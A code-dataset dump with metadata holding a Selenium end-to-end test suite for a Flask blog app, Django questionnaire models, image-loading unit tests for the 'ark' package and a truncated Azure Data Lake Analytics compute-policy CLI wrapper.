| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c35ec34bca9d31fa383b11657895dfcc192d7398
| 6,626
|
py
|
Python
|
tests/end-to-end/test_selenium.py
|
orached/itora_tuto
|
8de36d834fc7ef2dc8895ec7ac048fb420de76e3
|
[
"MIT"
] | null | null | null |
tests/end-to-end/test_selenium.py
|
orached/itora_tuto
|
8de36d834fc7ef2dc8895ec7ac048fb420de76e3
|
[
"MIT"
] | 3
|
2020-03-24T18:03:03.000Z
|
2021-02-02T22:23:27.000Z
|
tests/end-to-end/test_selenium.py
|
orached/itora_tuto
|
8de36d834fc7ef2dc8895ec7ac048fb420de76e3
|
[
"MIT"
] | null | null | null |
import pytest
import re
def test_home_page(setUp_selenium, populate_db):
"""
GIVEN a new visitor
    WHEN he accesses the home page
THEN posts are displayed
"""
setUp_selenium.get("http://localhost:5000")
assert re.search('<p>post from john</p>',
setUp_selenium.page_source)
def test_login_page(setUp_selenium, populate_db):
"""
GIVEN a new visitor
    WHEN he tries to log in
THEN it's processed correctly
"""
setUp_selenium.get("http://localhost:5000")
# navigate to login page
setUp_selenium.find_element_by_link_text('Se connecter').click()
re.search('<h1>Sign In</h1>', setUp_selenium.page_source)
# log in
setUp_selenium.find_element_by_name('username').\
send_keys('john')
setUp_selenium.find_element_by_name('password').send_keys('cat')
setUp_selenium.find_element_by_name('submit').click()
assert re.search('<p>post from susan</p>',
setUp_selenium.page_source)
assert re.search('Se déconnecter', setUp_selenium.page_source)
# navigate to logout page
setUp_selenium.find_element_by_link_text('Se déconnecter').click()
def test_registration_page(setUp_selenium):
"""
GIVEN a new visitor
WHEN he tries to register
THEN it's processed correctly
"""
setUp_selenium.get("http://localhost:5000")
# navigate to registration page
setUp_selenium.find_element_by_link_text('Se connecter').click()
setUp_selenium.find_element_by_link_text('S\'enregistrer').click()
# register
setUp_selenium.find_element_by_name('username').\
send_keys('donald')
setUp_selenium.find_element_by_name('email').\
send_keys('donald@example.com')
setUp_selenium.find_element_by_name('password').send_keys('duck')
setUp_selenium.find_element_by_name('password2').send_keys('duck')
setUp_selenium.find_element_by_name('submit').click()
assert re.search('Un mail de confirmation vous a été envoyé.',
setUp_selenium.page_source)
    # log in with the registered user
setUp_selenium.find_element_by_name('username').\
send_keys('donald')
setUp_selenium.find_element_by_name('password').send_keys('duck')
setUp_selenium.find_element_by_name('submit').click()
setUp_selenium.find_element_by_link_text('Articles').click()
assert re.search('Vous n\'avez pas encore confirmer votre compte.',
setUp_selenium.page_source)
setUp_selenium.find_element_by_link_text('Profil').click()
assert re.search('Vous n\'avez pas encore confirmer votre compte.',
setUp_selenium.page_source)
@pytest.mark.skip(reason='Must learn more about how to test summernote field')
def test_post_creation(setUp_selenium, populate_db):
"""
    GIVEN a registered user
WHEN he tries to add a new post
THEN it's processed correctly
"""
setUp_selenium.get("http://localhost:5000")
# navigate to login page
setUp_selenium.find_element_by_link_text('Se connecter').click()
# log in
setUp_selenium.find_element_by_name('username').\
send_keys('john')
setUp_selenium.find_element_by_name('password').send_keys('cat')
setUp_selenium.find_element_by_name('submit').click()
# navigate to post management page
setUp_selenium.find_element_by_link_text('Articles').click()
setUp_selenium.find_element_by_name('title').\
send_keys('Post with selenium webdriver')
setUp_selenium.find_element_by_name('post').\
send_keys('This is a post created by an automated test case with Selenium webdriver')
setUp_selenium.find_element_by_name('submit').click()
assert re.search('Votre article est publié !',
setUp_selenium.page_source)
def test_send_message(setUp_selenium, populate_db):
"""
GIVEN an authenticated user
    WHEN he sends a message to a registered user
THEN it's processed correctly
"""
setUp_selenium.get("http://localhost:5000")
# navigate to login page
setUp_selenium.find_element_by_link_text('Se connecter').click()
# log in
setUp_selenium.find_element_by_name('username').\
send_keys('john')
setUp_selenium.find_element_by_name('password').send_keys('cat')
setUp_selenium.find_element_by_name('submit').click()
    # navigate to susan's profile page
setUp_selenium.find_element_by_link_text('susan').click()
setUp_selenium.find_element_by_link_text('Envoyer un message privé').click()
setUp_selenium.find_element_by_name('message').\
send_keys('Message sent to susan from john via selenium webdriver')
setUp_selenium.find_element_by_name('submit').click()
assert re.search('Votre message a été envoyé.',
setUp_selenium.page_source)
# navigate to logout page
setUp_selenium.find_element_by_link_text('Se déconnecter').click()
# navigate to login page
setUp_selenium.find_element_by_link_text('Se connecter').click()
# log in with Susan account
setUp_selenium.find_element_by_name('username').\
send_keys('susan')
setUp_selenium.find_element_by_name('password').send_keys('dog')
setUp_selenium.find_element_by_name('submit').click()
setUp_selenium.find_element_by_partial_link_text('Messages').click()
assert "Message sent to susan from john via selenium webdriver" in setUp_selenium.page_source
def test_follow_unfollow(setUp_selenium, populate_db):
"""
GIVEN an authenticated user
    WHEN he follows or unfollows a user
THEN it's processed correctly
"""
setUp_selenium.get("http://localhost:5000")
# navigate to login page
setUp_selenium.find_element_by_link_text('Se connecter').click()
# log in
setUp_selenium.find_element_by_name('username').\
send_keys('john')
setUp_selenium.find_element_by_name('password').send_keys('cat')
setUp_selenium.find_element_by_name('submit').click()
    # navigate to mary's profile page
setUp_selenium.find_element_by_link_text('mary').click()
setUp_selenium.find_element_by_link_text('Follow').click()
assert 'Vous suivez maintenant mary !' in setUp_selenium.page_source
setUp_selenium.get("http://localhost:5000")
setUp_selenium.find_element_by_link_text('susan').click()
setUp_selenium.find_element_by_link_text('Unfollow').click()
assert 'Vous ne suivez plus susan.' in setUp_selenium.page_source
#assert '<p>post from mary</p>' in setUp_selenium.page_source
#assert '<p>post from susan</p>' not in setUp_selenium.page_source
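# Sketch of the conftest.py fixture the tests above rely on. This is
# hypothetical: the project's real fixture definitions are not shown in this
# file, and the driver choice is an assumption. The `find_element_by_*` calls
# above imply the Selenium 3-era API.
#
#   import pytest
#   from selenium import webdriver
#
#   @pytest.fixture
#   def setUp_selenium():
#       driver = webdriver.Chrome()
#       yield driver
#       driver.quit()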
| 41.936709
| 97
| 0.715515
| 905
| 6,626
| 4.923757
| 0.150276
| 0.215889
| 0.179309
| 0.253142
| 0.821813
| 0.80588
| 0.75202
| 0.720153
| 0.694794
| 0.612882
| 0
| 0.0057
| 0.179143
| 6,626
| 157
| 98
| 42.203822
| 0.813569
| 0.151826
| 0
| 0.602151
| 0
| 0
| 0.201391
| 0
| 0
| 0
| 0
| 0
| 0.11828
| 1
| 0.064516
| false
| 0.086022
| 0.021505
| 0
| 0.086022
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
c37cbb0522d43b820944549b0224eabcfc5636c3
| 9,350
|
py
|
Python
|
Questionnaire_type2/models.py
|
AdityaKapoor74/Supervised_Categorization_Study_Pt2
|
abedfa64d708360694e5cc00cfae866c5cfaebe8
|
[
"MIT"
] | null | null | null |
Questionnaire_type2/models.py
|
AdityaKapoor74/Supervised_Categorization_Study_Pt2
|
abedfa64d708360694e5cc00cfae866c5cfaebe8
|
[
"MIT"
] | null | null | null |
Questionnaire_type2/models.py
|
AdityaKapoor74/Supervised_Categorization_Study_Pt2
|
abedfa64d708360694e5cc00cfae866c5cfaebe8
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class UserDetails(models.Model):
class Meta:
verbose_name_plural = "User Details"
first_name = models.CharField(max_length=100,blank=True,null=True,default=None)
last_name = models.CharField(max_length=100,blank=True,null=True,default=None)
email = models.EmailField()
gender = models.CharField(max_length=10,blank=True,null=True,default=None)
city = models.CharField(max_length=100,blank=True,null=True,default=None)
country = models.CharField(max_length=100,blank=True,null=True,default=None)
age = models.IntegerField(blank=True, null=True, default=None)
set_num = models.CharField(max_length=10,blank=True,null=True,default=None)
def __str__(self):
        return f"{self.first_name or ''} {self.last_name or ''}".strip()  # tolerate null name fields
class Observe_And_Learn_Samples_set1(models.Model):
class Meta:
verbose_name_plural = "Observe and Learn Samples Set 1"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Observe_And_Learn_Samples_set2(models.Model):
class Meta:
verbose_name_plural = "Observe and Learn Samples Set 2"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Observe_And_Learn_Samples_set3(models.Model):
class Meta:
verbose_name_plural = "Observe and Learn Samples Set 3"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Observe_And_Learn_Samples_set4(models.Model):
class Meta:
verbose_name_plural = "Observe and Learn Samples Set 4"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Observe_And_Learn_Samples_set5(models.Model):
class Meta:
verbose_name_plural = "Observe and Learn Samples Set 5"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Classify_And_Learn_Samples_set1(models.Model):
class Meta:
verbose_name_plural = "Classify and Learn Samples Set 1"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Classify_And_Learn_Samples_set2(models.Model):
class Meta:
verbose_name_plural = "Classify and Learn Samples Set 2"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Classify_And_Learn_Samples_set3(models.Model):
class Meta:
verbose_name_plural = "Classify and Learn Samples Set 3"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Classify_And_Learn_Samples_set4(models.Model):
class Meta:
verbose_name_plural = "Classify and Learn Samples Set 4"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Classify_And_Learn_Samples_set5(models.Model):
class Meta:
verbose_name_plural = "Classify and Learn Samples Set 5"
sample_img = models.ImageField(upload_to='images/')
sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Common_Features_Test_set1(models.Model):
class Meta:
verbose_name_plural = "Common Features Test Samples Set 1"
sample_img = models.ImageField(upload_to='images/')
# sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Common_Features_Test_set2(models.Model):
class Meta:
verbose_name_plural = "Common Features Test Samples Set 2"
sample_img = models.ImageField(upload_to='images/')
# sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Common_Features_Test_set3(models.Model):
class Meta:
verbose_name_plural = "Common Features Test Samples Set 3"
sample_img = models.ImageField(upload_to='images/')
# sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Common_Features_Test_set4(models.Model):
class Meta:
verbose_name_plural = "Common Features Test Samples Set 4"
sample_img = models.ImageField(upload_to='images/')
# sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class Common_Features_Test_set5(models.Model):
class Meta:
verbose_name_plural = "Common Features Test Samples Set 5"
sample_img = models.ImageField(upload_to='images/')
# sample_label = models.CharField(max_length=10,blank=True,null=True,default=None)
class UserResponse_Common_Features_Test_set1(models.Model):
class Meta:
verbose_name_plural = "User Response for Common Features Test phase set 1"
user_option = models.CharField(max_length=10,default=None)
quid = models.ForeignKey(Common_Features_Test_set1, on_delete=models.CASCADE)
user = models.ForeignKey(UserDetails, on_delete=models.CASCADE, default=None, blank=True)
iteration = models.IntegerField(default=1)
time_taken = models.FloatField(default=None, blank=False)
class UserResponse_Common_Features_Test_set2(models.Model):
class Meta:
verbose_name_plural = "User Response for Common Features Test phase set 2"
user_option = models.CharField(max_length=10,default=None)
quid = models.ForeignKey(Common_Features_Test_set2, on_delete=models.CASCADE)
user = models.ForeignKey(UserDetails, on_delete=models.CASCADE, default=None, blank=True)
    iteration = models.IntegerField(default=1)
    time_taken = models.FloatField(default=None, blank=False)  # present in sets 1 and 3-5; restored for consistency
class UserResponse_Common_Features_Test_set3(models.Model):
class Meta:
verbose_name_plural = "User Response for Common Features Test phase set 3"
user_option = models.CharField(max_length=10,default=None)
quid = models.ForeignKey(Common_Features_Test_set3, on_delete=models.CASCADE)
user = models.ForeignKey(UserDetails, on_delete=models.CASCADE, default=None, blank=True)
iteration = models.IntegerField(default=1)
time_taken = models.FloatField(default=None, blank=False)
class UserResponse_Common_Features_Test_set4(models.Model):
class Meta:
verbose_name_plural = "User Response for Common Features Test phase set 4"
user_option = models.CharField(max_length=10,default=None)
quid = models.ForeignKey(Common_Features_Test_set4, on_delete=models.CASCADE)
user = models.ForeignKey(UserDetails, on_delete=models.CASCADE, default=None, blank=True)
iteration = models.IntegerField(default=1)
time_taken = models.FloatField(default=None, blank=False)
class UserResponse_Common_Features_Test_set5(models.Model):
class Meta:
verbose_name_plural = "User Response for Common Features Test phase set 5"
user_option = models.CharField(max_length=10,default=None)
quid = models.ForeignKey(Common_Features_Test_set5, on_delete=models.CASCADE)
user = models.ForeignKey(UserDetails, on_delete=models.CASCADE, default=None, blank=True)
iteration = models.IntegerField(default=1)
time_taken = models.FloatField(default=None, blank=False)
class UserResponsesForDescription(models.Model):
class Meta:
verbose_name_plural = "User Responses for Description"
description = models.TextField(default=None, null=True, blank=True)
set_number = models.CharField(max_length=10,blank=True,null=True,default=None)
user = models.ForeignKey(UserDetails, on_delete=models.CASCADE, default=None, blank=True)
class CommonFeatureTable(models.Model):
class Meta:
verbose_name_plural = "Common Feature Test Table"
user_id = models.ForeignKey(UserDetails, on_delete=models.CASCADE)
set_number = models.IntegerField(default=None,blank=False)
block_number = models.IntegerField(default=None,blank=False)
sequence_number = models.IntegerField(default=None,blank=False)
file_name = models.CharField(max_length=150,blank=False,default=None)
user_option = models.CharField(max_length=10, default=None)
correct_option = models.CharField(max_length=10, default=None)
correct = models.IntegerField(default=None,blank=False)
time_taken = models.FloatField(default=None, blank=False)
timestamp = models.DateTimeField(editable=True, null=False, blank=False)
class ClassifyStimuliTable(models.Model):
    class Meta:
        verbose_name_plural = "Classify Stimuli Table"
user_id = models.ForeignKey(UserDetails, on_delete=models.CASCADE)
set_number = models.IntegerField(default=None, blank=False)
block_number = models.IntegerField(default=None, blank=False)
sequence_number = models.IntegerField(default=None, blank=False)
file_name = models.CharField(max_length=150, blank=False, default=None)
user_option = models.CharField(max_length=10, default=None)
correct = models.IntegerField(default=None, blank=False)
time_taken = models.FloatField(default=None, blank=False)
timestamp = models.DateTimeField(editable=True, null=False, blank=False)
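The five `*_set1` through `*_set5` variants of each model above differ only in `verbose_name_plural`. Sketched below is one way the duplication could be factored out with an abstract base model; this is a hypothetical refactoring, not the project's code, and applying it to an existing database would require new migrations:

# Sketch only: an abstract base class removes the per-set copy-paste.
from django.db import models

class SampleBase(models.Model):
    sample_img = models.ImageField(upload_to='images/')
    sample_label = models.CharField(max_length=10, blank=True, null=True, default=None)

    class Meta:
        abstract = True  # no table is created for the base class

class Observe_And_Learn_Samples_set1(SampleBase):
    class Meta:
        verbose_name_plural = "Observe and Learn Samples Set 1"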
| 38.79668
| 93
| 0.759358
| 1,259
| 9,350
| 5.431295
| 0.080222
| 0.086868
| 0.084235
| 0.112314
| 0.943551
| 0.937555
| 0.93346
| 0.93346
| 0.908599
| 0.908599
| 0
| 0.014957
| 0.141925
| 9,350
| 240
| 94
| 38.958333
| 0.837343
| 0.045882
| 0
| 0.564935
| 0
| 0
| 0.104442
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006494
| false
| 0
| 0.006494
| 0.006494
| 0.844156
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
6f56ba885f6de123f528e9e7e43d9e47dacd0083
| 14,567
|
py
|
Python
|
ark/utils/load_utils_test.py
|
ngreenwald/segmentation
|
8bc87c2db96434a24194040f7ea754af2caf5e5f
|
[
"Apache-2.0"
] | 1
|
2020-01-15T22:23:41.000Z
|
2020-01-15T22:23:41.000Z
|
ark/utils/load_utils_test.py
|
ngreenwald/segmentation
|
8bc87c2db96434a24194040f7ea754af2caf5e5f
|
[
"Apache-2.0"
] | 103
|
2020-01-06T23:32:43.000Z
|
2020-08-14T04:42:00.000Z
|
ark/utils/load_utils_test.py
|
ngreenwald/segmentation
|
8bc87c2db96434a24194040f7ea754af2caf5e5f
|
[
"Apache-2.0"
] | 5
|
2020-02-21T14:00:20.000Z
|
2020-07-02T07:41:33.000Z
|
import numpy as np
import pytest
import tempfile
from ark.utils import load_utils, test_utils
def test_load_imgs_from_mibitiff():
# invalid directory is provided
with pytest.raises(ValueError):
loaded_xr = \
load_utils.load_imgs_from_mibitiff('not_a_dir', channels=None, delimiter='_')
with tempfile.TemporaryDirectory() as temp_dir:
# temp_dir contains no images
with pytest.raises(ValueError):
loaded_xr = load_utils.load_imgs_from_mibitiff(temp_dir,
channels=None,
delimiter='_')
# config test environment
fovs, channels = test_utils.gen_fov_chan_names(num_fovs=2, num_chans=3, use_delimiter=True)
filelocs, data_xr = test_utils.create_paired_xarray_fovs(
temp_dir, fovs, channels, img_shape=(10, 10), mode='mibitiff', delimiter='_',
fills=True, dtype=np.float32
)
with pytest.raises(ValueError):
# attempt to pass an empty channels list
loaded_xr = load_utils.load_imgs_from_mibitiff(temp_dir,
channels=[],
delimiter='_')
# check unspecified fov loading
loaded_xr = load_utils.load_imgs_from_mibitiff(temp_dir,
channels=channels,
delimiter='_')
assert loaded_xr.equals(data_xr)
fovnames = [f'{fov}.tiff' for fov in fovs]
# check specified fov loading
loaded_xr = load_utils.load_imgs_from_mibitiff(temp_dir,
mibitiff_files=[fovnames[-1]],
channels=channels,
delimiter='_')
assert loaded_xr.equals(data_xr.loc[[fovs[-1]], :, :, :])
# test automatic all channels loading
loaded_xr = load_utils.load_imgs_from_mibitiff(temp_dir,
delimiter='_',
dtype=np.float32)
assert loaded_xr.equals(data_xr)
# test delimiter agnosticism
loaded_xr = load_utils.load_imgs_from_mibitiff(temp_dir,
mibitiff_files=fovnames,
channels=channels,
delimiter='_',
dtype=np.float32)
assert loaded_xr.equals(data_xr)
assert np.issubdtype(loaded_xr.dtype, np.floating)
# test float overwrite
with pytest.warns(UserWarning):
loaded_xr = load_utils.load_imgs_from_mibitiff(temp_dir,
mibitiff_files=[fovnames[-1]],
channels=channels,
delimiter='_',
dtype='int16')
assert loaded_xr.equals(data_xr.loc[[fovs[-1]], :, :, :])
assert np.issubdtype(loaded_xr.dtype, np.floating)
def test_load_imgs_from_tree():
# invalid directory is provided
with pytest.raises(ValueError):
loaded_xr = \
load_utils.load_imgs_from_tree('not_a_dir', img_sub_folder="TIFs", dtype="int16")
# test loading from within fov directories
with tempfile.TemporaryDirectory() as temp_dir:
# temp_dir contains no images
with pytest.raises(ValueError):
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs", dtype="int16")
fovs, chans, imgs = test_utils.gen_fov_chan_names(num_fovs=3, num_chans=3,
return_imgs=True)
filelocs, data_xr = test_utils.create_paired_xarray_fovs(
temp_dir, fovs, chans, img_shape=(10, 10), delimiter='_', fills=True, sub_dir="TIFs",
dtype="int16"
)
with pytest.raises(ValueError):
# attempt to pass an empty channels list
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs",
dtype="int16", channels=[])
# check default loading of all files
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs", dtype="int16")
assert loaded_xr.equals(data_xr)
# check loading of specific files
some_fovs = fovs[:2]
some_imgs = imgs[:2]
some_chans = chans[:2]
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs", dtype="int16",
fovs=some_fovs, channels=some_imgs)
assert loaded_xr.equals(data_xr[:2, :, :, :2])
# check loading w/o file extension
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs", dtype="int16",
channels=some_chans)
assert loaded_xr.equals(data_xr[:, :, :, :2])
# check mixed extension presence
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs", dtype="int16",
channels=[chans[i] if i % 2 else imgs[i]
for i in range(3)])
assert loaded_xr.equals(data_xr)
# test loading with data_xr containing float values
with tempfile.TemporaryDirectory() as temp_dir:
fovs, chans, imgs = test_utils.gen_fov_chan_names(num_fovs=1, num_chans=2,
return_imgs=True)
filelocs, data_xr = test_utils.create_paired_xarray_fovs(
temp_dir, fovs, chans, img_shape=(10, 10), delimiter='_', fills=True, sub_dir="TIFs",
dtype=np.float32
)
with pytest.warns(UserWarning):
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs", dtype="int16")
assert loaded_xr.equals(data_xr)
# test swap int16 -> float
assert np.issubdtype(loaded_xr.dtype, np.floating)
# test loading with variable sizes
with tempfile.TemporaryDirectory() as temp_dir:
fovs, chans, imgs = test_utils.gen_fov_chan_names(num_fovs=3, num_chans=3,
return_imgs=True)
filelocs, data_xr = test_utils.create_paired_xarray_fovs(
temp_dir, fovs, chans, img_shape=(10, 10), delimiter='_', fills=True, sub_dir="TIFs",
dtype="int16"
)
loaded_xr = \
load_utils.load_imgs_from_tree(temp_dir, img_sub_folder="TIFs", dtype="int16",
max_image_size=12)
assert loaded_xr.shape == (3, 12, 12, 3)
def test_load_imgs_from_dir():
# invalid directory is provided
with pytest.raises(ValueError):
loaded_xr = \
load_utils.load_imgs_from_dir('not_a_dir', trim_suffix='_', dtype=np.float32)
# test loading from 'free' directory
with tempfile.TemporaryDirectory() as temp_dir:
# input directory contains no images
with pytest.raises(ValueError):
load_utils.load_imgs_from_dir(temp_dir, trim_suffix='_', dtype=np.float32)
fovs, _ = test_utils.gen_fov_chan_names(num_fovs=3, num_chans=0, use_delimiter=True)
filelocs, data_xr = test_utils.create_paired_xarray_fovs(temp_dir, fovs, [0],
img_shape=(10, 10), mode='labels',
delimiter='_', dtype=np.float32)
# invalid list of files is provided
with pytest.raises(ValueError):
load_utils.load_imgs_from_dir(temp_dir, files=fovs + ['not_an_image'],
trim_suffix='_', dtype=np.float32)
with pytest.raises(ValueError):
load_utils.load_imgs_from_dir(temp_dir, files=['not_an_image'],
trim_suffix='_', dtype=np.float32)
# check default loading
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, trim_suffix='_',
xr_dim_name='compartments', dtype=np.float32)
assert loaded_xr.equals(data_xr)
# check suffix matched loading:
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, match_substring='_otherinfo',
trim_suffix='_', xr_dim_name='compartments',
dtype=np.float32)
assert loaded_xr.equals(data_xr.loc[['fov0'], :, :, :])
fovnames = [f'{fov}.tiff' for fov in fovs]
# check general substring matched loading
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, match_substring='ov', trim_suffix='_',
xr_dim_name='compartments', dtype=np.float32)
assert loaded_xr.equals(data_xr)
# check provided file overruling of match_substring
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, files=fovnames,
match_substring='_otherinfo', trim_suffix='_',
xr_dim_name='compartments', dtype=np.float32)
assert loaded_xr.equals(data_xr)
# test error on no matched suffix
with pytest.raises(ValueError):
load_utils.load_imgs_from_dir(temp_dir, match_substring='not_a_real_suffix',
trim_suffix='_', xr_dim_name='compartments',
dtype=np.float32)
# test swap float -> int16
with pytest.warns(UserWarning):
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, trim_suffix='_', force_ints=True,
xr_dim_name='compartments', dtype="int16")
assert loaded_xr.equals(data_xr)
assert loaded_xr.dtype == 'int16'
# test swap int16 -> float
with pytest.warns(UserWarning):
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, trim_suffix='_',
xr_dim_name='compartments', dtype="int16")
assert loaded_xr.equals(data_xr)
assert np.issubdtype(loaded_xr.dtype, np.floating)
# test multitiff input
with tempfile.TemporaryDirectory() as temp_dir:
fovs, channels = test_utils.gen_fov_chan_names(num_fovs=2, num_chans=3, use_delimiter=True)
filelocs, data_xr = test_utils.create_paired_xarray_fovs(
temp_dir, fovs, channels, img_shape=(10, 10), mode='reverse_multitiff', delimiter='_',
fills=True, dtype=np.float32
)
fovnames = [f'{fov}.tiff' for fov in fovs]
# test all channels loading w/ specified file
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, files=[fovnames[-1]],
xr_dim_name='channels', trim_suffix='_',
dtype=np.float32)
assert loaded_xr.equals(data_xr.loc[[fovs[-1]], :, :, :])
# indices should be between 0-2
with pytest.raises(ValueError):
load_utils.load_imgs_from_dir(temp_dir, files=[fovnames[-1]], xr_dim_name='channels',
trim_suffix='_', dtype=np.float32,
channel_indices=[0, 1, 4])
# xr_channel_names should contain 3 names (as there are 3 channels)
with pytest.raises(ValueError):
load_utils.load_imgs_from_dir(temp_dir, files=[fovnames[-1]], xr_dim_name='channels',
trim_suffix='_', dtype=np.float32,
xr_channel_names=['A', 'B'])
# test all channels w/ unspecified files + trim_suffix agnosticism
loaded_xr = load_utils.load_imgs_from_dir(temp_dir,
files=None,
channel_indices=None,
xr_dim_name='channels',
trim_suffix='_')
assert loaded_xr.equals(data_xr)
# test with specified channel_indices
loaded_xr = load_utils.load_imgs_from_dir(temp_dir,
files=None,
channel_indices=[0, 1, 2],
xr_dim_name='channels',
trim_suffix='_')
assert loaded_xr.equals(data_xr[:, :, :, :3])
# test channels_first input
fovs, channels = test_utils.gen_fov_chan_names(num_fovs=2, num_chans=5, use_delimiter=True)
_, data_xr = test_utils.create_paired_xarray_fovs(
temp_dir, fovs, channels, img_shape=(10, 10), mode='multitiff', delimiter='_',
fills=True, dtype=np.float32, channels_first=True
)
fovnames = [f'{fov}.tiff' for fov in fovs]
# test all channels loading w/ specified file
loaded_xr = load_utils.load_imgs_from_dir(temp_dir, files=[fovnames[-1]],
xr_dim_name='channels', trim_suffix='_',
dtype=np.float32)
assert loaded_xr.equals(data_xr.loc[[fovs[-1]], :, :, :])
# test all channels w/ unspecified files + trim_suffix agnosticism
loaded_xr = load_utils.load_imgs_from_dir(temp_dir,
files=None,
channel_indices=None,
xr_dim_name='channels',
trim_suffix='_')
assert loaded_xr.equals(data_xr)
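For reference, the call signature exercised throughout these tests suggests the following kind of usage outside the suite; the directory path below is a placeholder, not a value from the repository:

# Hedged usage sketch based on the test calls above.
from ark.utils import load_utils

data_dir = '/path/to/fov_dirs'  # each fov directory holds a "TIFs" subfolder
imgs_xr = load_utils.load_imgs_from_tree(data_dir,
                                         img_sub_folder="TIFs",
                                         dtype="int16")
print(imgs_xr.shape)  # (num_fovs, rows, cols, num_channels)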
| 44.959877
| 99
| 0.527974
| 1,548
| 14,567
| 4.633721
| 0.100129
| 0.062456
| 0.063572
| 0.08295
| 0.842325
| 0.830894
| 0.815837
| 0.77722
| 0.758678
| 0.726195
| 0
| 0.017577
| 0.386833
| 14,567
| 323
| 100
| 45.099071
| 0.78549
| 0.095696
| 0
| 0.705882
| 0
| 0
| 0.035943
| 0
| 0
| 0
| 0
| 0
| 0.132353
| 1
| 0.014706
| false
| 0
| 0.019608
| 0
| 0.034314
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f5ebdf1c1eb17cb199aa7432267f4a08c815139
| 2,805
|
py
|
Python
|
pyaz/dla/account/compute_policy/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/dla/account/compute_policy/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/dla/account/compute_policy/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | 1
|
2022-02-03T09:12:01.000Z
|
2022-02-03T09:12:01.000Z
|
from ....pyaz_utils import _call_az
def create(account, compute_policy_name, object_id, object_type, max_dop_per_job=None, min_priority_per_job=None, resource_group=None):
'''
Create a compute policy in the Data Lake Analytics account.
Required Parameters:
- account -- Name of the Data Lake Analytics account.
    - compute_policy_name -- The name of the compute policy to create.
    - object_id -- The Azure Active Directory object ID of the user, group, or service principal the policy applies to.
    - object_type -- The type of Azure Active Directory object the object ID refers to.
    Optional Parameters:
    - max_dop_per_job -- The maximum degree of parallelism allowed per job under this policy.
    - min_priority_per_job -- The minimum priority allowed per job under this policy.
- resource_group -- If not specified, will attempt to discover the resource group for the specified Data Lake Analytics account.
'''
return _call_az("az dla account compute-policy create", locals())
def update(account, compute_policy_name, max_dop_per_job=None, min_priority_per_job=None, resource_group=None):
'''
Update a compute policy in the Data Lake Analytics account.
Required Parameters:
- account -- Name of the Data Lake Analytics account.
    - compute_policy_name -- The name of the compute policy to update.
    Optional Parameters:
    - max_dop_per_job -- The maximum degree of parallelism allowed per job under this policy.
    - min_priority_per_job -- The minimum priority allowed per job under this policy.
- resource_group -- If not specified, will attempt to discover the resource group for the specified Data Lake Analytics account.
'''
return _call_az("az dla account compute-policy update", locals())
def list(account, resource_group=None):
'''
    List compute policies in a Data Lake Analytics account.
Required Parameters:
- account -- Name of the Data Lake Analytics account.
Optional Parameters:
